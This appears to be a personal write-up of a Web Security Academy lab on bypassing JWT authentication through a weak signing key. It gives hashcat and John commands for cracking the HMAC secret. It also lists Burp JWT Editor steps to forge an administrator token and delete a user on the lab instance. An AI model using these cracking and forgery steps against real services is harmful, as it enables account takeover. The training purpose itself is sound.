Brute-forcing secret keys

Brute-forcing secret keys using hashcat

Hashcat

hashcat -a 0 -m 16500 <jwt> <wordlist>

Output format: <jwt>:<identified-secret>

If you run the command more than once, you need to include the --show flag to output the results.

Lab

Lab: JWT authentication bypass via weak signing key | Web Security AcademyWebSecAcademy

This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

To solve the lab, first brute-force the website's secret key. Once you've obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Steps

Getting the JWT Token

Install JWT Editor extension in burp suite
Visit the website and login using username as wiener and password as peter
Capture and copy the JWT token

Brute force the jwt token using Hashcat and John

hashcat -a 0 -m 16500 <JWT Token> <Wordlist>

 john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

Creating and Signing tokens using the secret key

Go to JWT Editor Tab
Click on New Symmetric Key
Select Specify secret option and enter the key as "secret1"
Click on Generate button and click on Ok
Now, visit the /admin route and send the request to repeater
In the payload section change the sub value to administrator
Click on Sign button and click on Ok

Delete the user Carlos

Now copy the newly created token
Visit https://0ac10073042c936880bd3575007e0084.web-security-academy.net/admin/delete?username=carlos
Now in the proxy tab modify the jwt token to the new copied one and then forward the request
$$$

PreviousExploiting flawed JWT signature verification NextJWT header parameter injections

Last updated 7 months ago